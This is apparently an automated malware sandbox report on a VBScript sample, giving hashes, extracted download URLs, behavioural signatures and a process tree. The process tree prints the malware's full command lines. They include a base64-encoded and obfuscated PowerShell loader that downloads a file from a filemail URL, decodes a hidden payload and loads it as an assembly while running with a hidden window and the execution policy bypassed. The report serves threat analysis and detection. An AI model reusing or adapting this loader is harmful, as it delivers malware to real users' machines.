Resubmissions
07-11-2024 16:02
241107-tg9hhavgnl 1007-11-2024 15:49
241107-s9mzjavfng 1007-11-2024 11:30
241107-nl46pa1jdz 10Analysis
-
max time kernel
119s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07-11-2024 15:49
Static task
static1
Behavioral task
behavioral1
Sample
dfcugh.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
dfcugh.vbs
Resource
win10v2004-20241007-en
General
-
Target
dfcugh.vbs
-
Size
13KB
-
MD5
4f3e6d1619f31390de9a461391f10dba
-
SHA1
9d90fa6b3bb7809fc800751c6cfc41dc68742a84
-
SHA256
2202962f09e94846b9677dda2358f0f04871bcd02c6ac3c5f3f27e85982d26c6
-
SHA512
f609e24d91a9ee08fe9b89f4909eb8745045d67b0b20d187d4586f5c382cefc2af96baacd1125aef96b71cc4eeeefdf0baa4467a1bb66637edfedacca9615427
-
SSDEEP
384:CiQvc9iQZ4T6+wi7Ahrd5RxEA/mywQfD6U512ChMsB+5wZ/f3CPR:CiQk9iQzn512ChMsB+4/fyPR
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
WScript.exepowershell.exeflow pid Process 3 3000 WScript.exe 4 3000 WScript.exe 8 2656 powershell.exe 9 2656 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid Process 2092 powershell.exe 2656 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid Process 2092 powershell.exe 2656 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2092 powershell.exe Token: SeDebugPrivilege 2656 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
WScript.exeWScript.exepowershell.exedescription pid Process procid_target PID 2948 wrote to memory of 3000 2948 WScript.exe 31 PID 2948 wrote to memory of 3000 2948 WScript.exe 31 PID 2948 wrote to memory of 3000 2948 WScript.exe 31 PID 3000 wrote to memory of 2092 3000 WScript.exe 32 PID 3000 wrote to memory of 2092 3000 WScript.exe 32 PID 3000 wrote to memory of 2092 3000 WScript.exe 32 PID 2092 wrote to memory of 2656 2092 powershell.exe 34 PID 2092 wrote to memory of 2656 2092 powershell.exe 34 PID 2092 wrote to memory of 2656 2092 powershell.exe 34
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dfcugh.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RLlBJGBXJiGLuhwiJI.js"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAgACgAIAAkAHAAcwBoAG8AbQBlAFsANABdACsAJABwAHMAaABPAE0ARQBbADMANABdACsAJwB4ACcAKQAoACAAKAAnAEwAeABGAGkAbQBhAGcAJwArACcAZQBVAHIAbAAgAD0AIABEAFgAdgBoAHQAdABwACcAKwAnAHMAOgAvAC8AMQAwADEANwAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAJwArACcAPwBmAGkAbABlAGsAZQB5AD0AMgBBAGEAXwBiAFcAbwA5AFIAZQB1ADQANQB0ADcAQgBVADEAawBWAGcAcwBkADkAcABUADkAcABnAFMAUwBsAHYAUwB0AEcAcgBuAFQASQBDAGYARgBoAG0AVABLAGoAMwBMAEMANgBTAFEAdABJAGMATwBjAF8AVAAzADUAJwArACcAdwAmAHAAawBfAHYAaQBkAD0AZgBkADQAZgA2ADEAJwArACcANAAnACsAJwBiAGIAMgAwADkAYwA2ADIAYwAxADcAMwAwADkANAA1ADEANwA2AGEAMAA5ADAANABmACAARABYAHYAOwBMAHgARgB3AGUAYgAnACsAJwBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsATAB4AEYAaQBtAGEAZwBlAEIAJwArACcAeQB0AGUAcwAgAD0AIABMAHgARgB3AGUAYgBDAGwAaQBlAG4AJwArACcAdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgATAB4AEYAaQBtAGEAZwBlAFUAcgBsACkAOwAnACsAJwBMACcAKwAnAHgARgBpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjACcAKwAnAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQAnACsAJwBuAGcAKABMAHgARgBpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwBMAHgARgBzAHQAYQByAHQARgBsAGEAZwAgAD0AIABEAFgAdgA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AEQAWAB2ADsATAB4AEYAZQAnACsAJwBuAGQARgBsAGEAZwAgAD0AIABEAFgAdgA8ADwAQgBBAFMARQA2ADQAXwBFACcAKwAnAE4ARAA+AD4ARABYAHYAOwBMAHgARgBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAEwAeAAnACsAJwBGAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEwAeABGAHMAdABhAHIAdABGAGwAYQBnACkAOwBMAHgARgBlAG4AZABJAG4AZABlAHgAIAA9ACAATAB4AEYAaQBtAGEAJwArACcAZwBlAFQAZQB4ACcAKwAnAHQALgBJAG4AZABlAHgATwBmACgATAB4AEYAZQBuAGQARgBsAGEAZwApADsATAB4AEYAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIABMAHgARgBlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAEwAeABGAHMAdABhAHIAdABJAG4AZABlAHgAOwBMAHgARgBzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJwArACcATAB4AEYAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AEwAeABGAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAEwAeABGAGUAbgBkAEkAbgBkAGUAeAAgAC0AIABMAHgARgBzAHQAYQByAHQASQBuAGQAZQB4ADsATAB4AEYAYgBhACcAKwAnAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIABMAHgARgBpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgATAB4AEYAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAATAB4AEYAYgBhAHMAZQA2ADQATABlAG4AZwB0ACcAKwAnAGgAKQA7AEwAeABGAGIAYQBzAGUANgA0AFIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoAEwAeABGAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBUAG8AQwBoAGEAcgAnACsAJwBBAHIAcgBhAHkAKAApACAAOABiAEMAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAATAB4AEYAXwAgAH0AKQBbAC0AMQAuAC4ALQAoAEwAeABGAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBMAGUAbgBnAHQAaAApACcAKwAnAF0AOwBMAHgARgBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgATAB4AEYAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACkAJwArACcAOwBMAHgARgBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEwAeABGAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwBMAHgARgB2AGEAaQBNAGUAdABoAG8AZAAgAD0AIABbAGQAbgBsAGkAYgAnACsAJwAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgARABYAHYAVgBBAEkARABYAHYAKQA7AEwAeABGAHYAYQBpAE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKABMAHgARgBuAHUAbABsACwAIABAACgARAAnACsAJwBYAHYAdAB4AHQALgBkAHMAdABlAHAALwBwAG8AcAAvAHUAZQAuAHAAcgBnAHgAYQBtAHkAZwByAGUAbgBlAC4AZwBpAGcALwAvADoAcAB0AHQAaABEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAMQBEAFgAdgAsACAARABYAHYAZAB4AGQAaQBhAGcARABYAHYALABEAFgAdgBkAGUAcwBhAHQAaQB2AGEAZABvAEQAWAB2ACwAIABEAFgAdgBkAGUAcwBhAHQAaQB2AGEAZABvAEQAWAB2ACwARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsAEQAWAB2AGQAJwArACcAZQBzAGEAdABpAHYAYQBkAG8ARABYAHYALABEAFgAdgBkAGUAcwBhAHQAaQB2AGEAZABvAEQAWAB2ACwARABYAHYAMQBEAFgAdgAsAEQAWAB2AGQAZQBzAGEAdABpAHYAYQBkAG8ARABYAHYAKQApADsAJwApAC4AcgBlAFAAbABBAEMARQAoACcAOABiAEMAJwAsAFsAcwB0AFIASQBOAEcAXQBbAEMASABhAFIAXQAxADIANAApAC4AcgBlAFAAbABBAEMARQAoACcATAB4AEYAJwAsAFsAcwB0AFIASQBOAEcAXQBbAEMASABhAFIAXQAzADYAKQAuAHIAZQBQAGwAQQBDAEUAKAAnAEQAWAB2ACcALABbAHMAdABSAEkATgBHAF0AWwBDAEgAYQBSAF0AMwA5ACkAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $pshome[4]+$pshOME[34]+'x')( ('LxFimag'+'eUrl = DXvhttp'+'s://1017.filemail.com/api/file/get'+'?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f61'+'4'+'bb209c62c1730945176a0904f DXv;LxFweb'+'Client = New-Object System.Net.WebClient;LxFimageB'+'ytes = LxFwebClien'+'t.DownloadData(LxFimageUrl);'+'L'+'xFimageText = [System.Text.Enc'+'oding]::UTF8.GetStri'+'ng(LxFimageBytes);LxFstartFlag = DXv<<BASE64_START>>DXv;LxFe'+'ndFlag = DXv<<BASE64_E'+'ND>>DXv;LxFstartIndex = Lx'+'FimageText.IndexOf(LxFstartFlag);LxFendIndex = LxFima'+'geTex'+'t.IndexOf(LxFendFlag);LxFstartIndex -ge 0 -and LxFendIndex -gt LxFstartIndex;LxFstartIndex += '+'LxFstartFlag.Length;LxFbase64Length = LxFendIndex - LxFstartIndex;LxFba'+'se64Command = LxFimageText.Substring(LxFstartIndex, LxFbase64Lengt'+'h);LxFbase64Reversed = -join (LxFbase64Command.ToChar'+'Array() 8bC ForEach-Object { LxF_ })[-1..-(LxFbase64Command.Length)'+'];LxFcommandBytes = [System.Convert]::FromBase64String(LxFbase64Reversed)'+';LxFloadedAssembly = [System.Reflection.Assembly]::Load(LxFcommandBytes);LxFvaiMethod = [dnlib'+'.IO.Home].GetMethod(DXvVAIDXv);LxFvaiMethod.Invoke(LxFnull, @(D'+'Xvtxt.dstep/pop/ue.prgxamygrene.gig//:ptthDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXv1DXv, DXvdxdiagDXv,DXvdesativadoDXv, DXvdesativadoDXv,DXvdesativadoDXv,DXvd'+'esativadoDXv,DXvdesativadoDXv,DXv1DXv,DXvdesativadoDXv));').rePlACE('8bC',[stRING][CHaR]124).rePlACE('LxF',[stRING][CHaR]36).rePlACE('DXv',[stRING][CHaR]39))"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD53d68e0db63d092d83baf5f2e61a2240c
SHA154bec790443c5eceea3819b516714d8d73588684
SHA256718f980994f02da3640c8618398ac88a4c3bfb7df0dd9ba118af2f5ef305819a
SHA512115f21a1066286b28855a3ddf9aa2d3f37525bbc9da5807755a8b5b5111bd4e1af539388f8ab69dea37c0ac36096fbe837bad4a52939bc31847bc2583a2841cf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5be3963bae63b053554c811e1f84d207d
SHA1ad885f0f42df6fa352478104966b33b0e8621862
SHA256203e0b24258ad6ccaca72b291abf9d61dbb86267546ef7ab022ba1b8f0a12410
SHA512bf9fe2d0b330f0b94afac97721248b6b30d51ca3468afaa8cc9dd5955465eeff9d3f38e9518a0719d750275f30310a2add17ed5c165e2f41a388d30471cbee04